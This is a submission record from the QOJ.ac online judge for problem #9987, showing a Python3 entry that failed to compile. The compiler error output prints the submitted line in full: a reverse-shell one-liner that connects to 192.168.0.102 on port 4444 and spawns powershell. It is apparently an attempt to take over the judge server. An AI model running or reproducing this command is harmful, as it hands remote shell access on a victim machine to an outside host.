QOJ.ac
QOJ
ID | Problem | Submitter | Result | Time | Memory | Language | File size | Submit time | Judge time |
---|---|---|---|---|---|---|---|---|---|
#869197 | #9987. 骑行计划 | HuangHanSheng | Compile Error | / | / | Python3 | 224b | 2025-01-25 00:16:08 | 2025-01-25 00:16:08 |
Due to the privacy settings of the submitter, you are not allowed to view this code.
Details
File "answer.code", line 1 export RHOST="192.168.0.102";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("powershell")' ^^^^^ SyntaxError: invalid syntax